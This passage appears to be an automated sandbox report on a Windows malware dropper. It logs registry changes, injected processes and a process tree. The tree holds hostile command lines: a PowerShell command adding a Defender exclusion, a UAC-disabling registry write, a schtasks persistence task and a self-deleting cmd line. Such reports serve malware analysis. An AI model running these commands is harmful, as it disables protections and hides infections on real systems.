"Central Brazilian Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time" windefender.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 aH61TFChdeJtMgESTog4SHo0.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e aH61TFChdeJtMgESTog4SHo0.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e aH61TFChdeJtMgESTog4SHo0.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e aH61TFChdeJtMgESTog4SHo0.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c00000001000000040000000010000004000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e aH61TFChdeJtMgESTog4SHo0.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4704 powershell.exe 4704 powershell.exe 3464 powershell.exe 3464 powershell.exe 3464 powershell.exe 2340 powershell.exe 2340 powershell.exe 2340 powershell.exe 1996 nsl94EF.tmp 1996 nsl94EF.tmp 4900 4BB4lI7t5tls4oaeCojmPguo.exe 4900 4BB4lI7t5tls4oaeCojmPguo.exe 1828 tb4IzGgTXDqdahLq6zcyrMSD.exe 1828 tb4IzGgTXDqdahLq6zcyrMSD.exe 1304 powershell.exe 1304 powershell.exe 3104 powershell.exe 3104 powershell.exe 1304 powershell.exe 3104 powershell.exe 3236 4BB4lI7t5tls4oaeCojmPguo.exe 3236 4BB4lI7t5tls4oaeCojmPguo.exe 3236 4BB4lI7t5tls4oaeCojmPguo.exe 3236 4BB4lI7t5tls4oaeCojmPguo.exe 3236 4BB4lI7t5tls4oaeCojmPguo.exe 3236 4BB4lI7t5tls4oaeCojmPguo.exe 3236 4BB4lI7t5tls4oaeCojmPguo.exe 3236 4BB4lI7t5tls4oaeCojmPguo.exe 3236 4BB4lI7t5tls4oaeCojmPguo.exe 3236 4BB4lI7t5tls4oaeCojmPguo.exe 748 tb4IzGgTXDqdahLq6zcyrMSD.exe 748 tb4IzGgTXDqdahLq6zcyrMSD.exe 748 tb4IzGgTXDqdahLq6zcyrMSD.exe 748 tb4IzGgTXDqdahLq6zcyrMSD.exe 748 tb4IzGgTXDqdahLq6zcyrMSD.exe 748 tb4IzGgTXDqdahLq6zcyrMSD.exe 748 tb4IzGgTXDqdahLq6zcyrMSD.exe 748 tb4IzGgTXDqdahLq6zcyrMSD.exe 748 tb4IzGgTXDqdahLq6zcyrMSD.exe 748 tb4IzGgTXDqdahLq6zcyrMSD.exe 1036 powershell.exe 1036 powershell.exe 1036 powershell.exe 3196 powershell.exe 3196 powershell.exe 3196 powershell.exe 632 Conhost.exe 632 Conhost.exe 632 Conhost.exe 448 powershell.exe 448 powershell.exe 448 powershell.exe 2056 0oZh5cYXBl8lBcDmHCsfbXMu.exe 2056 0oZh5cYXBl8lBcDmHCsfbXMu.exe 2056 0oZh5cYXBl8lBcDmHCsfbXMu.exe 4536 powershell.EXE 4536 powershell.EXE 4536 powershell.EXE 3012 powershell.exe 3012 powershell.exe 3012 powershell.exe 1732 reg.exe 1732 reg.exe 1732 reg.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
description pid Process Token: SeDebugPrivilege 3592 file.exe Token: SeDebugPrivilege 8 CasPol.exe Token: SeDebugPrivilege 4704 powershell.exe Token: SeDebugPrivilege 3464 powershell.exe Token: SeDebugPrivilege 2340 powershell.exe Token: SeDebugPrivilege 4900 4BB4lI7t5tls4oaeCojmPguo.exe Token: SeImpersonatePrivilege 4900 4BB4lI7t5tls4oaeCojmPguo.exe Token: SeDebugPrivilege 1828 tb4IzGgTXDqdahLq6zcyrMSD.exe Token: SeImpersonatePrivilege 1828 tb4IzGgTXDqdahLq6zcyrMSD.exe Token: SeDebugPrivilege 3104 powershell.exe Token: SeDebugPrivilege 1304 powershell.exe Token: SeDebugPrivilege 1036 powershell.exe Token: SeDebugPrivilege 3196 powershell.exe Token: SeDebugPrivilege 632 Conhost.exe Token: SeDebugPrivilege 448 powershell.exe Token: SeDebugPrivilege 2056 0oZh5cYXBl8lBcDmHCsfbXMu.exe Token: SeDebugPrivilege 4536 powershell.EXE Token: SeDebugPrivilege 3012 powershell.exe Token: SeDebugPrivilege 1732 reg.exe Token: SeSystemEnvironmentPrivilege 3888 csrss.exe Token: SeSecurityPrivilege 4404 reg.exe Token: SeSecurityPrivilege 4404 reg.exe Token: SeDebugPrivilege 4700 powershell.exe Token: SeDebugPrivilege 3508 powershell.exe Token: SeDebugPrivilege 1368 powershell.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3208 BroomSetup.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3592 wrote to memory of 4704 3592 file.exe 91 PID 3592 wrote to memory of 4704 3592 file.exe 91 PID 3592 wrote to memory of 4704 3592 file.exe 91 PID 3592 wrote to memory of 8 3592 file.exe 92 PID 3592 wrote to memory of 8 3592 file.exe 92 PID 3592 wrote to memory of 8 3592 file.exe 92 PID 3592 wrote to memory of 8 3592 file.exe 92 PID 3592 wrote to memory of 8 3592 file.exe 92 PID 3592 wrote to memory of 8 3592 file.exe 92 PID 3592 wrote to memory of 8 3592 file.exe 92 PID 3592 wrote to memory of 8 3592 file.exe 92 PID 8 wrote to memory of 1496 8 CasPol.exe 100 PID 8 wrote to memory of 1496 8 CasPol.exe 100 PID 8 wrote to memory of 1496 8 CasPol.exe 100 PID 1496 wrote to memory of 3208 1496 Zj91d9v5NpNUsLuVMDIaf2ST.exe 101 PID 1496 wrote to memory of 3208 1496 Zj91d9v5NpNUsLuVMDIaf2ST.exe 101 PID 1496 wrote to memory of 3208 1496 Zj91d9v5NpNUsLuVMDIaf2ST.exe 101 PID 8 wrote to memory of 4900 8 CasPol.exe 102 PID 8 wrote to memory of 4900 8 CasPol.exe 102 PID 8 wrote to memory of 4900 8 CasPol.exe 102 PID 8 wrote to memory of 1828 8 CasPol.exe 103 PID 8 wrote to memory of 1828 8 CasPol.exe 103 PID 8 wrote to memory of 1828 8 CasPol.exe 103 PID 1496 wrote to memory of 1996 1496 Zj91d9v5NpNUsLuVMDIaf2ST.exe 104 PID 1496 wrote to memory of 1996 1496 Zj91d9v5NpNUsLuVMDIaf2ST.exe 104 PID 1496 wrote to memory of 1996 1496 Zj91d9v5NpNUsLuVMDIaf2ST.exe 104 PID 3208 wrote to memory of 3352 3208 BroomSetup.exe 105 PID 3208 wrote to memory of 3352 3208 BroomSetup.exe 105 PID 3208 wrote to memory of 3352 3208 BroomSetup.exe 105 PID 8 wrote to memory of 4240 8 CasPol.exe 107 PID 8 wrote to memory of 4240 8 CasPol.exe 107 PID 3352 wrote to memory of 4016 3352 cmd.exe 109 PID 3352 wrote to memory of 4016 3352 cmd.exe 109 PID 3352 wrote to memory of 4016 3352 cmd.exe 109 PID 3352 wrote to memory of 4268 3352 cmd.exe 108 PID 3352 wrote to memory of 4268 3352 cmd.exe 108 PID 3352 wrote to memory of 4268 3352 cmd.exe 108 PID 4900 wrote to memory of 3464 4900 4BB4lI7t5tls4oaeCojmPguo.exe 111 PID 4900 wrote to memory of 3464 4900 4BB4lI7t5tls4oaeCojmPguo.exe 111 PID 4900 wrote to memory of 3464 4900 4BB4lI7t5tls4oaeCojmPguo.exe 111 PID 1828 wrote to memory of 2340 1828 tb4IzGgTXDqdahLq6zcyrMSD.exe 112 PID 1828 wrote to memory of 2340 1828 tb4IzGgTXDqdahLq6zcyrMSD.exe 112 PID 1828 wrote to memory of 2340 1828 tb4IzGgTXDqdahLq6zcyrMSD.exe 112 PID 3236 wrote to memory of 1304 3236 4BB4lI7t5tls4oaeCojmPguo.exe 117 PID 3236 wrote to memory of 1304 3236 4BB4lI7t5tls4oaeCojmPguo.exe 117 PID 3236 wrote to memory of 1304 3236 4BB4lI7t5tls4oaeCojmPguo.exe 117 PID 748 wrote to memory of 3104 748 tb4IzGgTXDqdahLq6zcyrMSD.exe 120 PID 748 wrote to memory of 3104 748 tb4IzGgTXDqdahLq6zcyrMSD.exe 120 PID 748 wrote to memory of 3104 748 tb4IzGgTXDqdahLq6zcyrMSD.exe 120 PID 8 wrote to memory of 656 8 CasPol.exe 121 PID 8 wrote to memory of 656 8 CasPol.exe 121 PID 8 wrote to memory of 656 8 CasPol.exe 121 PID 656 wrote to memory of 2152 656 aH61TFChdeJtMgESTog4SHo0.exe 122 PID 656 wrote to memory of 2152 656 aH61TFChdeJtMgESTog4SHo0.exe 122 PID 656 wrote to memory of 2152 656 aH61TFChdeJtMgESTog4SHo0.exe 122 PID 656 wrote to memory of 4736 656 aH61TFChdeJtMgESTog4SHo0.exe 125 PID 656 wrote to memory of 4736 656 aH61TFChdeJtMgESTog4SHo0.exe 125 PID 656 wrote to memory of 4736 656 aH61TFChdeJtMgESTog4SHo0.exe 125 PID 656 wrote to memory of 1816 656 aH61TFChdeJtMgESTog4SHo0.exe 124 PID 656 wrote to memory of 1816 656 aH61TFChdeJtMgESTog4SHo0.exe 124 PID 656 wrote to memory of 1816 656 aH61TFChdeJtMgESTog4SHo0.exe 124 PID 1816 wrote to memory of 4756 1816 aH61TFChdeJtMgESTog4SHo0.exe 123 PID 1816 wrote to memory of 4756 1816 aH61TFChdeJtMgESTog4SHo0.exe 123 PID 1816 wrote to memory of 4756 1816 aH61TFChdeJtMgESTog4SHo0.exe 123 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- UAC bypass
- Windows security bypass
- Checks computer location settings
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3592 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\file.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4704
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"2⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:8 -
C:\Users\Admin\Pictures\Zj91d9v5NpNUsLuVMDIaf2ST.exe"C:\Users\Admin\Pictures\Zj91d9v5NpNUsLuVMDIaf2ST.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1496 -
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exeC:\Users\Admin\AppData\Local\Temp\BroomSetup.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3208 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:3352 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F6⤵
- Creates scheduled task(s)
PID:4268
-
-
C:\Windows\SysWOW64\chcp.comchcp 12516⤵PID:4016
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsl94EF.tmpC:\Users\Admin\AppData\Local\Temp\nsl94EF.tmp4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1996 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 33045⤵
- Program crash
PID:4272
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nsl94EF.tmp" & del "C:\ProgramData\*.dll"" & exit5⤵PID:4968
-
-
-
-
C:\Users\Admin\Pictures\4BB4lI7t5tls4oaeCojmPguo.exe"C:\Users\Admin\Pictures\4BB4lI7t5tls4oaeCojmPguo.exe"3⤵
